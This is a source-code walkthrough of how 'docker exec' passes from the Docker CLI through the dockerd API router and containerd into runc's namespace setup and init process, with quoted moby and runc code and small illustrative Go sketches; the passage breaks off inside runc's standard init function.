func runExec(dockerCli command.Cli, options execOptions) error {
    ...
    response, err := client.ContainerExecCreate(ctx, options.container, *execConfig)
    if err != nil {
        return err
    }

    execID := response.ID
    if execID == "" {
        return errors.New("exec ID empty")
    }

    if execConfig.Detach {
        execStartCheck := types.ExecStartCheck{
            Detach: execConfig.Detach,
            Tty:    execConfig.Tty,
        }
        return client.ContainerExecStart(ctx, execID, execStartCheck)
    }
    return interactiveExec(ctx, dockerCli, execConfig, execID)
}
// ContainerExecCreate creates a new exec configuration to run an exec process.
func (cli *Client) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) {
    var response types.IDResponse
    if err := cli.NewVersionError("1.25", "env"); len(config.Env) != 0 && err != nil {
        return response, err
    }
    resp, err := cli.post(ctx, "/containers/"+container+"/exec", nil, config, nil)
    defer ensureReaderClosed(resp)
    if err != nil {
        return response, err
    }
    err = json.NewDecoder(resp.body).Decode(&response)
    return response, err
}
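Driving the same two endpoints through the official Go SDK makes the CLI flow easy to reproduce. A minimal sketch of a detached exec (the container name "mycontainer" is an assumption, not from the source):

package main

import (
    "context"
    "fmt"

    "github.com/docker/docker/api/types"
    "github.com/docker/docker/client"
)

func main() {
    ctx := context.Background()
    cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
    if err != nil {
        panic(err)
    }
    // POST /containers/{name}/exec — registers the exec instance, returns its ID.
    resp, err := cli.ContainerExecCreate(ctx, "mycontainer", types.ExecConfig{
        Cmd:    []string{"touch", "/tmp/hello"},
        Detach: true,
    })
    if err != nil {
        panic(err)
    }
    // POST /exec/{id}/start — actually runs the process.
    if err := cli.ContainerExecStart(ctx, resp.ID, types.ExecStartCheck{Detach: true}); err != nil {
        panic(err)
    }
    fmt.Println("started exec", resp.ID)
}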
func (cli *DaemonCli) start(opts *daemonOptions) (err error) {
    ...
    // define the API server
    cli.api = apiserver.New(serverConfig)
    ...
    // create the Daemon
    d, err := daemon.NewDaemon(ctx, cli.Config, pluginStore)
    if err != nil {
        return errors.Wrap(err, "failed to start daemon")
    }

    d.StoreHosts(hosts)

    // validate after NewDaemon has restored enabled plugins. Don't change order.
    if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, pluginStore); err != nil {
        return errors.Wrap(err, "failed to validate authorization plugin")
    }

    cli.d = d

    if err := startMetricsServer(cli.Config.MetricsAddress); err != nil {
        return errors.Wrap(err, "failed to start metrics server")
    }

    c, err := createAndStartCluster(cli, d)
    if err != nil {
        logrus.Fatalf("Error starting cluster component: %v", err)
    }

    // Restart all autostart containers which have a swarm endpoint
    // and are not yet running now that we have successfully
    // initialized the cluster.
    d.RestartSwarmContainers()

    logrus.Info("Daemon has completed initialization")

    // build the router options
    routerOptions, err := newRouterOptions(cli.Config, d)
    if err != nil {
        return err
    }
    routerOptions.api = cli.api
    routerOptions.cluster = c

    // initialize the routes
    initRouter(routerOptions)

    go d.ProcessClusterNotifications(ctx, c.GetWatchStream())

    cli.setupConfigReloadTrap()

    // The serve API routine never exits unless an error occurs
    // We need to start it as a goroutine and wait on it so
    // daemon doesn't exit
    serveAPIWait := make(chan error)
    go cli.api.Wait(serveAPIWait)

    // after the daemon is done setting up we can notify systemd api
    notifyReady()

    // Daemon is fully initialized and handling API traffic
    // Wait for serve API to complete
    errAPI := <-serveAPIWait
    c.Cleanup()

    // shut down the Daemon
    // notify systemd that we're shutting down
    notifyStopping()
    shutdownDaemon(d)

    // Stop notification processing and any background processes
    cancel()

    if errAPI != nil {
        return errors.Wrap(errAPI, "shutting down due to ServeAPI error")
    }

    logrus.Info("Daemon shutdown complete")
    return nil
}
Next, let's look at the initRouter(routerOptions) function:
func initRouter(opts routerOptions) {
    ...
    routers := []router.Router{
        // we need to add the checkpoint router before the container router or the DELETE gets masked
        checkpointrouter.NewRouter(opts.daemon, decoder),
        container.NewRouter(opts.daemon, decoder, opts.daemon.RawSysInfo(true).CgroupUnified),
        image.NewRouter(opts.daemon.ImageService()),
        systemrouter.NewRouter(opts.daemon, opts.cluster, opts.buildkit, opts.features),
        volume.NewRouter(opts.daemon.VolumesService()),
        build.NewRouter(opts.buildBackend, opts.daemon, opts.features),
        sessionrouter.NewRouter(opts.sessionManager),
        swarmrouter.NewRouter(opts.cluster),
        pluginrouter.NewRouter(opts.daemon.PluginManager()),
        distributionrouter.NewRouter(opts.daemon.ImageService()),
    }
    ...
    opts.api.InitRouter(routers...)
}
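Every entry in this slice satisfies the same tiny contract: expose a route table and let the server do the registration. A toy, self-contained analogue of the api/server/router pattern (names simplified; the real handler type is httputils.APIFunc, and method matching is elided here):

package main

import (
    "fmt"
    "net/http"
)

// Route describes one API endpoint; Router groups a sub-system's routes.
type Route interface {
    Method() string
    Path() string
    Handler() http.HandlerFunc
}

type Router interface {
    Routes() []Route
}

type route struct {
    method, path string
    h            http.HandlerFunc
}

func (r route) Method() string            { return r.method }
func (r route) Path() string              { return r.path }
func (r route) Handler() http.HandlerFunc { return r.h }

// pingRouter plays the role of one sub-router (container, image, ...).
type pingRouter struct{}

func (pingRouter) Routes() []Route {
    return []Route{route{"GET", "/_ping", func(w http.ResponseWriter, r *http.Request) {
        fmt.Fprint(w, "OK")
    }}}
}

func initRouter(mux *http.ServeMux, routers ...Router) {
    for _, rt := range routers {
        for _, r := range rt.Routes() {
            mux.HandleFunc(r.Path(), r.Handler())
        }
    }
}

func main() {
    mux := http.NewServeMux()
    initRouter(mux, pingRouter{})
    http.ListenAndServe("127.0.0.1:8080", mux)
}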
// Wait blocks the server goroutine until it exits.
// It sends an error message if there is any error during
// the API execution.
func (s *Server) Wait(waitChan chan error) {
    if err := s.serveAPI(); err != nil {
        logrus.Errorf("ServeAPI error: %v", err)
        waitChan <- err
        return
    }
    waitChan <- nil
}

// serveAPI loops through all initialized servers and spawns goroutine
// with Serve method for each. It sets createMux() as Handler also.
func (s *Server) serveAPI() error {
    var chErrors = make(chan error, len(s.servers))
    for _, srv := range s.servers {
        srv.srv.Handler = s.createMux()
        go func(srv *HTTPServer) {
            var err error
            logrus.Infof("API listen on %s", srv.l.Addr())
            if err = srv.Serve(); err != nil && strings.Contains(err.Error(), "use of closed network connection") {
                err = nil
            }
            chErrors <- err
        }(srv)
    }

    for range s.servers {
        err := <-chErrors
        if err != nil {
            return err
        }
    }

    return nil
}
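The pattern here is a plain fan-in: one goroutine per listener, a buffered error channel sized to the listener count, and a receive loop that returns on the first failure. A standalone sketch of the same idea (listener address made up):

package main

import (
    "fmt"
    "net"
    "net/http"
)

func serveAll(listeners []net.Listener, handler http.Handler) error {
    errs := make(chan error, len(listeners)) // buffered so no goroutine blocks on send
    for _, l := range listeners {
        go func(l net.Listener) {
            // http.Serve blocks until the listener is closed or fails.
            errs <- http.Serve(l, handler)
        }(l)
    }
    // Wait on every listener; fail fast on the first real error.
    for range listeners {
        if err := <-errs; err != nil {
            return err
        }
    }
    return nil
}

func main() {
    l, err := net.Listen("tcp", "127.0.0.1:0")
    if err != nil {
        panic(err)
    }
    fmt.Println("listening on", l.Addr())
    _ = serveAll([]net.Listener{l}, http.NewServeMux())
}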
// createMux initializes the main router the server uses.
func (s *Server) createMux() *mux.Router {
    m := mux.NewRouter()

    logrus.Debug("Registering routers")
    // iterate over the routers passed in earlier and register each route
    for _, apiRouter := range s.routers {
        for _, r := range apiRouter.Routes() {
            f := s.makeHTTPHandler(r.Handler())
            logrus.Debugf("Registering %s, %s", r.Method(), r.Path())
            m.Path(versionMatcher + r.Path()).Methods(r.Method()).Handler(f)
            m.Path(r.Path()).Methods(r.Method()).Handler(f)
        }
    }

    debugRouter := debug.NewRouter()
    s.routers = append(s.routers, debugRouter)
    for _, r := range debugRouter.Routes() {
        f := s.makeHTTPHandler(r.Handler())
        m.Path("/debug" + r.Path()).Handler(f)
    }

    notFoundHandler := httputils.MakeErrorHandler(pageNotFoundError{})
    m.HandleFunc(versionMatcher+"/{path:.*}", notFoundHandler)
    m.NotFoundHandler = notFoundHandler
    m.MethodNotAllowedHandler = notFoundHandler

    return m
}
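Note that each route is registered twice: once under the versioned prefix (versionMatcher is a gorilla/mux pattern along the lines of /v{version:[0-9.]+}) and once bare, so both /v1.40/containers/json and /containers/json match. A small sketch of that double registration (paths and port are assumptions):

package main

import (
    "fmt"
    "net/http"

    "github.com/gorilla/mux"
)

const versionMatcher = "/v{version:[0-9.]+}"

func main() {
    m := mux.NewRouter()
    h := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        // mux.Vars(r)["version"] is empty for the unversioned registration.
        fmt.Fprintf(w, "version=%q\n", mux.Vars(r)["version"])
    })
    // Register the same handler with and without the version prefix.
    m.Path(versionMatcher + "/containers/json").Methods("GET").Handler(h)
    m.Path("/containers/json").Methods("GET").Handler(h)

    http.ListenAndServe("127.0.0.1:8080", m)
}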
// initRoutes initializes the routes in container router
func (r *containerRouter) initRoutes() {
    r.routes = []router.Route{
        // HEAD
        router.NewHeadRoute("/containers/{name:.*}/archive", r.headContainersArchive),
        // GET
        router.NewGetRoute("/containers/json", r.getContainersJSON),
        router.NewGetRoute("/containers/{name:.*}/export", r.getContainersExport),
        router.NewGetRoute("/containers/{name:.*}/changes", r.getContainersChanges),
        router.NewGetRoute("/containers/{name:.*}/json", r.getContainersByName),
        router.NewGetRoute("/containers/{name:.*}/top", r.getContainersTop),
        router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs),
        router.NewGetRoute("/containers/{name:.*}/stats", r.getContainersStats),
        router.NewGetRoute("/containers/{name:.*}/attach/ws", r.wsContainersAttach),
        router.NewGetRoute("/exec/{id:.*}/json", r.getExecByID),
        router.NewGetRoute("/containers/{name:.*}/archive", r.getContainersArchive),
        // POST
        router.NewPostRoute("/containers/create", r.postContainersCreate),
        router.NewPostRoute("/containers/{name:.*}/kill", r.postContainersKill),
        router.NewPostRoute("/containers/{name:.*}/pause", r.postContainersPause),
        router.NewPostRoute("/containers/{name:.*}/unpause", r.postContainersUnpause),
        router.NewPostRoute("/containers/{name:.*}/restart", r.postContainersRestart),
        router.NewPostRoute("/containers/{name:.*}/start", r.postContainersStart),
        router.NewPostRoute("/containers/{name:.*}/stop", r.postContainersStop),
        router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait),
        router.NewPostRoute("/containers/{name:.*}/resize", r.postContainersResize),
        router.NewPostRoute("/containers/{name:.*}/attach", r.postContainersAttach),
        router.NewPostRoute("/containers/{name:.*}/copy", r.postContainersCopy), // Deprecated since 1.8, Errors out since 1.12
        router.NewPostRoute("/containers/{name:.*}/exec", r.postContainerExecCreate),
        router.NewPostRoute("/exec/{name:.*}/start", r.postContainerExecStart),
        router.NewPostRoute("/exec/{name:.*}/resize", r.postContainerExecResize),
        router.NewPostRoute("/containers/{name:.*}/rename", r.postContainerRename),
        router.NewPostRoute("/containers/{name:.*}/update", r.postContainerUpdate),
        router.NewPostRoute("/containers/prune", r.postContainersPrune),
        router.NewPostRoute("/commit", r.postCommit),
        // PUT
        router.NewPutRoute("/containers/{name:.*}/archive", r.putContainersArchive),
        // DELETE
        router.NewDeleteRoute("/containers/{name:.*}", r.deleteContainers),
    }
}
func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    ...
    // Register an instance of Exec in container.
    id, err := s.backend.ContainerExecCreate(name, execConfig)
    if err != nil {
        logrus.Errorf("Error setting up exec command in container %s: %v", name, err)
        return err
    }

    return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{
        ID: id,
    })
}
// ContainerExecCreate sets up an exec in a running container.
func (daemon *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) {
    ...
    execConfig := exec.NewConfig()
    execConfig.OpenStdin = config.AttachStdin
    execConfig.OpenStdout = config.AttachStdout
    execConfig.OpenStderr = config.AttachStderr
    execConfig.ContainerID = cntr.ID
    execConfig.DetachKeys = keys
    execConfig.Entrypoint = entrypoint
    execConfig.Args = args
    execConfig.Tty = config.Tty
    execConfig.Privileged = config.Privileged
    execConfig.User = config.User
    execConfig.WorkingDir = config.WorkingDir
    ...
    return execConfig.ID, nil
}
// ContainerExecStart starts an exec process already created in the docker host.
func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error {
    resp, err := cli.post(ctx, "/exec/"+execID+"/start", nil, config, nil)
    ensureReaderClosed(resp)
    return err
}

// ContainerExecAttach attaches a connection to an exec process in the server.
// It returns a types.HijackedResponse with the hijacked connection
// and a reader to get output. It's up to the caller to close
// the hijacked connection by calling types.HijackedResponse.Close.
func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) {
    headers := map[string][]string{"Content-Type": {"application/json"}}
    return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers)
}
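For a non-detached exec, the CLI's interactiveExec ultimately rides on this hijacked connection. A hedged sketch of consuming it directly; without a TTY the stream is multiplexed, so stdcopy splits stdout from stderr (the container name and command are assumptions):

package main

import (
    "context"
    "os"

    "github.com/docker/docker/api/types"
    "github.com/docker/docker/client"
    "github.com/docker/docker/pkg/stdcopy"
)

func main() {
    ctx := context.Background()
    cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
    if err != nil {
        panic(err)
    }
    resp, err := cli.ContainerExecCreate(ctx, "mycontainer", types.ExecConfig{
        Cmd:          []string{"ls", "-l", "/"},
        AttachStdout: true,
        AttachStderr: true,
    })
    if err != nil {
        panic(err)
    }
    // The same POST /exec/{id}/start endpoint serves both start and attach;
    // here the HTTP connection is hijacked into a raw stream.
    hijacked, err := cli.ContainerExecAttach(ctx, resp.ID, types.ExecStartCheck{})
    if err != nil {
        panic(err)
    }
    defer hijacked.Close()
    // Demultiplex the stdout/stderr frames onto our own stdio.
    if _, err := stdcopy.StdCopy(os.Stdout, os.Stderr, hijacked.Reader); err != nil {
        panic(err)
    }
}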
// TODO(vishh): Refactor the code to avoid having to specify stream config as part of both create and start.
func (s *containerRouter) postContainerExecStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    ...
    // Now run the user process in container.
    // Maybe we should pass ctx here if we're not detaching?
    if err := s.backend.ContainerExecStart(context.Background(), execName, stdin, stdout, stderr); err != nil {
        if execStartCheck.Detach {
            return err
        }
        stdout.Write([]byte(err.Error() + "\r\n"))
        logrus.Errorf("Error running exec %s in container: %v", execName, err)
    }
    return nil
}
// ContainerExecStart starts a previously set up exec instance. The
// std streams are set up.
// If ctx is cancelled, the process is terminated.
func (daemon *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.Reader, stdout io.Writer, stderr io.Writer) (err error) {
    ...
    // run the command through containerd
    systemPid, err := daemon.containerd.Exec(ctx, c.ID, ec.ID, p, cStdin != nil, ec.InitializeStdio)
    ...
}
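daemon.containerd here is a client for containerd's gRPC API; the same exec can be driven with the containerd Go client directly. A rough sketch, assuming a running container "mycontainer" in the default namespace (not taken from the moby source):

package main

import (
    "context"
    "fmt"

    "github.com/containerd/containerd"
    "github.com/containerd/containerd/cio"
    "github.com/containerd/containerd/namespaces"
)

func main() {
    client, err := containerd.New("/run/containerd/containerd.sock")
    if err != nil {
        panic(err)
    }
    defer client.Close()
    ctx := namespaces.WithNamespace(context.Background(), "default")

    container, err := client.LoadContainer(ctx, "mycontainer")
    if err != nil {
        panic(err)
    }
    // Reuse the container's spec as the base for the exec'd process.
    spec, err := container.Spec(ctx)
    if err != nil {
        panic(err)
    }
    pspec := spec.Process
    pspec.Args = []string{"echo", "hello"}

    task, err := container.Task(ctx, nil)
    if err != nil {
        panic(err)
    }
    process, err := task.Exec(ctx, "exec-demo", pspec, cio.NewCreator(cio.WithStdio))
    if err != nil {
        panic(err)
    }
    exitCh, err := process.Wait(ctx)
    if err != nil {
        panic(err)
    }
    if err := process.Start(ctx); err != nil {
        panic(err)
    }
    status := <-exitCh
    code, _, _ := status.Result()
    fmt.Println("exit code:", code)
}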
Action: func(context *cli.Context) error {
    if err := checkArgs(context, 1, exactArgs); err != nil {
        return err
    }
    if err := revisePidFile(context); err != nil {
        return err
    }
    spec, err := setupSpec(context)
    if err != nil {
        return err
    }
    status, err := startContainer(context, spec, CT_ACT_RUN, nil)
    if err == nil {
        // exit with the container's exit status so any external supervisor is
        // notified of the exit with the correct exit status.
        os.Exit(status)
    }
    return err
},
func createContainer(context *cli.Context, id string, spec *specs.Spec) (libcontainer.Container, error) {
    rootlessCg, err := shouldUseRootlessCgroupManager(context)
    if err != nil {
        return nil, err
    }
    config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
        CgroupName:       id,
        UseSystemdCgroup: context.GlobalBool("systemd-cgroup"),
        NoPivotRoot:      context.Bool("no-pivot"),
        NoNewKeyring:     context.Bool("no-new-keyring"),
        Spec:             spec,
        RootlessEUID:     os.Geteuid() != 0,
        RootlessCgroups:  rootlessCg,
    })
    if err != nil {
        return nil, err
    }

    factory, err := loadFactory(context)
    if err != nil {
        return nil, err
    }
    return factory.Create(id, config)
}

// loadFactory returns the configured factory instance for execing containers.
func loadFactory(context *cli.Context) (libcontainer.Factory, error) {
    ...
    return libcontainer.New(abs, cgroupManager, intelRdtManager,
        libcontainer.CriuPath(context.GlobalString("criu")),
        libcontainer.NewuidmapPath(newuidmap),
        libcontainer.NewgidmapPath(newgidmap))
}

// New returns a linux based container factory based in the root directory and
// configures the factory with the provided option funcs.
func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
    if root != "" {
        if err := os.MkdirAll(root, 0o700); err != nil {
            return nil, newGenericError(err, SystemError)
        }
    }
    l := &LinuxFactory{
        Root:     root,
        InitPath: "/proc/self/exe",
        // the resulting command is effectively "runc init"
        InitArgs:  []string{os.Args[0], "init"},
        Validator: validate.New(),
        CriuPath:  "criu",
    }

    Cgroupfs(l)
    for _, opt := range options {
        if opt == nil {
            continue
        }
        if err := opt(l); err != nil {
            return nil, err
        }
    }
    return l, nil
}
// newProcess returns a new libcontainer Process with the arguments from the
// spec and stdio from the current process.
func newProcess(p specs.Process, init bool, logLevel string) (*libcontainer.Process, error) {
    // build the libcontainer.Process object
    lp := &libcontainer.Process{
        Args: p.Args,
        Env:  p.Env,
        // TODO: fix libcontainer's API to better support uid/gid in a typesafe way.
        User:            fmt.Sprintf("%d:%d", p.User.UID, p.User.GID),
        Cwd:             p.Cwd,
        Label:           p.SelinuxLabel,
        NoNewPrivileges: &p.NoNewPrivileges,
        AppArmorProfile: p.ApparmorProfile,
        Init:            init,
        LogLevel:        logLevel,
    }

    // populate the console size and capabilities (a security-sensitive spot?)
    if p.ConsoleSize != nil {
        lp.ConsoleWidth = uint16(p.ConsoleSize.Width)
        lp.ConsoleHeight = uint16(p.ConsoleSize.Height)
    }

    if p.Capabilities != nil {
        lp.Capabilities = &configs.Capabilities{}
        lp.Capabilities.Bounding = p.Capabilities.Bounding
        lp.Capabilities.Effective = p.Capabilities.Effective
        lp.Capabilities.Inheritable = p.Capabilities.Inheritable
        lp.Capabilities.Permitted = p.Capabilities.Permitted
        lp.Capabilities.Ambient = p.Capabilities.Ambient
    }
    for _, gid := range p.User.AdditionalGids {
        lp.AdditionalGroups = append(lp.AdditionalGroups, strconv.FormatUint(uint64(gid), 10))
    }
    for _, rlimit := range p.Rlimits {
        rl, err := createLibContainerRlimit(rlimit)
        if err != nil {
            return nil, err
        }
        lp.Rlimits = append(lp.Rlimits, rl)
    }
    return lp, nil
}
func (c *linuxContainer) Start(process *Process) error {
    c.m.Lock()
    defer c.m.Unlock()
    if c.config.Cgroups.Resources.SkipDevices {
        return newGenericError(errors.New("can't start container with SkipDevices set"), ConfigInvalid)
    }
    if process.Init {
        if err := c.createExecFifo(); err != nil {
            return err
        }
    }
    // the real work happens in start()
    if err := c.start(process); err != nil {
        if process.Init {
            c.deleteExecFifo()
        }
        return err
    }
    return nil
}

...

func (c *linuxContainer) start(process *Process) (retErr error) {
    // create the parent process for the new process
    parent, err := c.newParentProcess(process)
    if err != nil {
        return newSystemErrorWithCause(err, "creating new parent process")
    }

    logsDone := parent.forwardChildLogs()
    if logsDone != nil {
        defer func() {
            // Wait for log forwarder to finish. This depends on
            // runc init closing the _LIBCONTAINER_LOGPIPE log fd.
            err := <-logsDone
            if err != nil && retErr == nil {
                retErr = newSystemErrorWithCause(err, "forwarding init logs")
            }
        }()
    }

    if err := parent.start(); err != nil {
        return newSystemErrorWithCause(err, "starting container process")
    }

    if process.Init {
        c.fifo.Close()
        if c.config.Hooks != nil {
            s, err := c.currentOCIState()
            if err != nil {
                return err
            }
            if err := c.config.Hooks[configs.Poststart].RunHooks(s); err != nil {
                if err := ignoreTerminateErrors(parent.terminate()); err != nil {
                    logrus.Warn(errorsf.Wrapf(err, "Running Poststart hook"))
                }
                return err
            }
        }
    }
    return nil
}
func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
    // create the socket pair used for parent/child communication
    parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
    if err != nil {
        return nil, newSystemErrorWithCause(err, "creating new init pipe")
    }
    messageSockPair := filePair{parentInitPipe, childInitPipe}

    parentLogPipe, childLogPipe, err := os.Pipe()
    if err != nil {
        return nil, fmt.Errorf("Unable to create the log pipe: %s", err)
    }
    logFilePair := filePair{parentLogPipe, childLogPipe}

    // build the exec.Cmd, wiring the child ends of the pipes into it
    cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
    if !p.Init {
        return c.newSetnsProcess(p, cmd, messageSockPair, logFilePair)
    }

    // We only set up fifoFd if we're not doing a `runc exec`. The historic
    // reason for this is that previously we would pass a dirfd that allowed
    // for container rootfs escape (and not doing it in `runc exec` avoided
    // that problem), but we no longer do that. However, there's no need to do
    // this for `runc exec` so we just keep it this way to be safe.
    if err := c.includeExecFifo(cmd); err != nil {
        return nil, newSystemErrorWithCause(err, "including execfifo in cmd.Exec setup")
    }
    // call newInitProcess() and return the process object
    return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
func (p *initProcess) start() (retErr error) {
    defer p.messageSockPair.parent.Close()
    // launch the "runc init" command
    err := p.cmd.Start()
    ...
    // write bootstrapData into the parent pipe for the "runc init" child to read
    if _, err := io.Copy(p.messageSockPair.parent, p.bootstrapData); err != nil {
        return newSystemErrorWithCause(err, "copying bootstrap data to pipe")
    }
    ...
    // parseSync waits for the child's replies
    ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
        ...
    })
    ...
}
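The init pipe is one end of a Unix socket pair, inherited by the child as a plain fd and advertised through an environment variable. A self-contained sketch of both sides of that handshake (payload and names are made up; real runc encodes the bootstrap data as netlink messages and uses utils.NewSockPair):

package main

import (
    "fmt"
    "os"
    "os/exec"
    "strconv"
    "syscall"
)

func main() {
    // Child branch: the re-exec'd "init" process reads the bootstrap data from
    // the fd advertised in _LIBCONTAINER_INITPIPE (this mirrors what
    // StartInitialization, shown later, does).
    if len(os.Args) > 1 && os.Args[1] == "init" {
        fd, err := strconv.Atoi(os.Getenv("_LIBCONTAINER_INITPIPE"))
        if err != nil {
            panic(err)
        }
        pipe := os.NewFile(uintptr(fd), "init-pipe")
        buf := make([]byte, 64)
        n, _ := pipe.Read(buf)
        fmt.Println("child: bootstrap data:", string(buf[:n]))
        return
    }

    // Parent branch: create a socket pair, hand one end to the child as an
    // inherited fd, then write the bootstrap data into the other end.
    fds, err := syscall.Socketpair(syscall.AF_UNIX, syscall.SOCK_STREAM|syscall.SOCK_CLOEXEC, 0)
    if err != nil {
        panic(err)
    }
    parentPipe := os.NewFile(uintptr(fds[0]), "parent-pipe")
    childPipe := os.NewFile(uintptr(fds[1]), "child-pipe")

    cmd := exec.Command("/proc/self/exe", "init")
    cmd.Stdout = os.Stdout
    cmd.ExtraFiles = []*os.File{childPipe} // becomes fd 3 in the child
    cmd.Env = append(os.Environ(), "_LIBCONTAINER_INITPIPE=3")
    if err := cmd.Start(); err != nil {
        panic(err)
    }
    childPipe.Close() // the child holds its own copy now

    if _, err := parentPipe.Write([]byte("bootstrap-data")); err != nil {
        panic(err)
    }
    cmd.Wait()
}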
void nsexec(void)
{
    int pipenum;
    jmp_buf env;
    int sync_child_pipe[2], sync_grandchild_pipe[2];
    struct nlconfig_t config = { 0 };

    /*
     * Setup a pipe to send logs to the parent. This should happen
     * first, because bail will use that pipe.
     */
    /* fetch the log pipe fd from the environment */
    setup_logpipe();

    /*
     * If we don't have an init pipe, just return to the go routine.
     * We'll only get an init pipe for start or exec.
     */
    pipenum = initpipe();
    if (pipenum == -1)
        return;

    /*
     * We need to re-exec if we are not in a cloned binary. This is necessary
     * to ensure that containers won't be able to access the host binary
     * through /proc/self/exe. See CVE-2019-5736.
     */
    /* the fix added for CVE-2019-5736: make sure the binary we are running
     * is already a cloned copy, not runc itself */
    if (ensure_cloned_binary() < 0)
        bail("could not ensure we are a cloned binary");
    ...
}
In init.go, the Action is defined as follows:
var initCommand = cli.Command{
    Name:  "init",
    Usage: `initialize the namespaces and launch the process (do not call it outside of runc)`,
    Action: func(context *cli.Context) error {
        factory, _ := libcontainer.New("")
        if err := factory.StartInitialization(); err != nil {
            // as the error is sent back to the parent there is no need to log
            // or write it to stderr because the parent process will handle this
            os.Exit(1)
        }
        panic("libcontainer: container init failed to exec")
    },
}
// StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
// This is a low level implementation detail of the reexec and should not be consumed externally
func (l *LinuxFactory) StartInitialization() (err error) {
    // Get the INITPIPE.
    envInitPipe := os.Getenv("_LIBCONTAINER_INITPIPE")
    pipefd, err := strconv.Atoi(envInitPipe)
    if err != nil {
        return fmt.Errorf("unable to convert _LIBCONTAINER_INITPIPE=%s to int: %s", envInitPipe, err)
    }
    pipe := os.NewFile(uintptr(pipefd), "pipe")
    defer pipe.Close()

    // Only init processes have FIFOFD.
    fifofd := -1
    envInitType := os.Getenv("_LIBCONTAINER_INITTYPE")
    it := initType(envInitType)
    if it == initStandard {
        envFifoFd := os.Getenv("_LIBCONTAINER_FIFOFD")
        if fifofd, err = strconv.Atoi(envFifoFd); err != nil {
            return fmt.Errorf("unable to convert _LIBCONTAINER_FIFOFD=%s to int: %s", envFifoFd, err)
        }
    }
    ...
    i, err := newContainerInit(it, pipe, consoleSocket, fifofd, logPipeFd)
    if err != nil {
        return err
    }

    // If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
    return i.Init()
}
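That closing comment is worth dwelling on: a successful exec(2) replaces the process image, so control never returns and deferred functions never run. A two-line illustration:

package main

import (
    "os"
    "syscall"
)

func main() {
    // syscall.Exec replaces the current process image; on success it never
    // returns, so no code (including defers) after this point executes.
    err := syscall.Exec("/bin/echo", []string{"echo", "replaced"}, os.Environ())
    // Only reached on failure.
    panic(err)
}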
func (l *linuxStandardInit) Init() error {
    runtime.LockOSThread()
    defer runtime.UnlockOSThread()

    if !l.config.Config.NoNewKeyring {
        if err := selinux.SetKeyLabel(l.config.ProcessLabel); err != nil {
            return err
        }
        defer selinux.SetKeyLabel("")
        ringname, keepperms, newperms := l.getSessionRingParams()

        // Do not inherit the parent's session keyring.
        if sessKeyId, err := keys.JoinSessionKeyring(ringname); err != nil {
            // If keyrings aren't supported then it is likely we are on an
            // older kernel (or inside an LXC container). While we could bail,
            // the security feature we are using here is best-effort (it only
            // really provides marginal protection since VFS credentials are
            // the only significant protection of keyrings).
            //
            // TODO(cyphar): Log this so people know what's going on, once we
            //               have proper logging in 'runc init'.
            if errors.Cause(err) != unix.ENOSYS {
                return errors.Wrap(err, "join session keyring")
            }
        } else {
            // Make session keyring searchable. If we've gotten this far we
            // bail on any error -- we don't want to have a keyring with bad
            // permissions.
            if err := keys.ModKeyringPerm(sessKeyId, keepperms, newperms); err != nil {
                return errors.Wrap(err, "mod keyring permissions")
            }
        }
    }

    if err := setupNetwork(l.config); err != nil {
        return err
    }
    if err := setupRoute(l.config.Config); err != nil {
        return err
    }

    // initialises the labeling system
    selinux.GetEnabled()
    if err := prepareRootfs(l.pipe, l.config); err != nil {
        return err
    }

    // Set up the console. This has to be done *before* we finalize the rootfs,
    // but *after* we've given the user the chance to set up all of the mounts
    // they wanted.
    if l.config.CreateConsole {
        if err := setupConsole(l.consoleSocket, l.config, true); err != nil {
            return err
        }
        if err := system.Setctty(); err != nil {
            return errors.Wrap(err, "setctty")
        }
    }

    // Finish the rootfs setup.
    if l.config.Config.Namespaces.Contains(configs.NEWNS) {
        if err := finalizeRootfs(l.config.Config); err != nil {
            return err
        }
    }

    if hostname := l.config.Config.Hostname; hostname != "" {
        if err := unix.Sethostname([]byte(hostname)); err != nil {
            return errors.Wrap(err, "sethostname")
        }
    }
    if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
        return errors.Wrap(err, "apply apparmor profile")
    }

    for key, value := range l.config.Config.Sysctl {
        if err := writeSystemProperty(key, value); err != nil {
            return errors.Wrapf(err, "write sysctl key %s", key)
        }
    }
    for _, path := range l.config.Config.ReadonlyPaths {
        if err := readonlyPath(path); err != nil {
            return errors.Wrapf(err, "readonly path %s", path)
        }
    }
    for _, path := range l.config.Config.MaskPaths {
        if err := maskPath(path, l.config.Config.MountLabel); err != nil {
            return errors.Wrapf(err, "mask path %s", path)
        }
    }

    pdeath, err := system.GetParentDeathSignal()
    if err != nil {
        return errors.Wrap(err, "get pdeath signal")
    }
    if l.config.NoNewPrivileges {
        if err := unix.Prctl(unix.PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); err != nil {
            return errors.Wrap(err, "set nonewprivileges")
        }
    }

    // Tell our parent that we're ready to Execv. This must be done before the
    // Seccomp rules have been applied, because we need to be able to read and
    // write to a socket.
    if err := syncParentReady(l.pipe); err != nil {
        return errors.Wrap(err, "sync ready")
    }
    if err := selinux.SetExecLabel(l.config.ProcessLabel); err != nil {
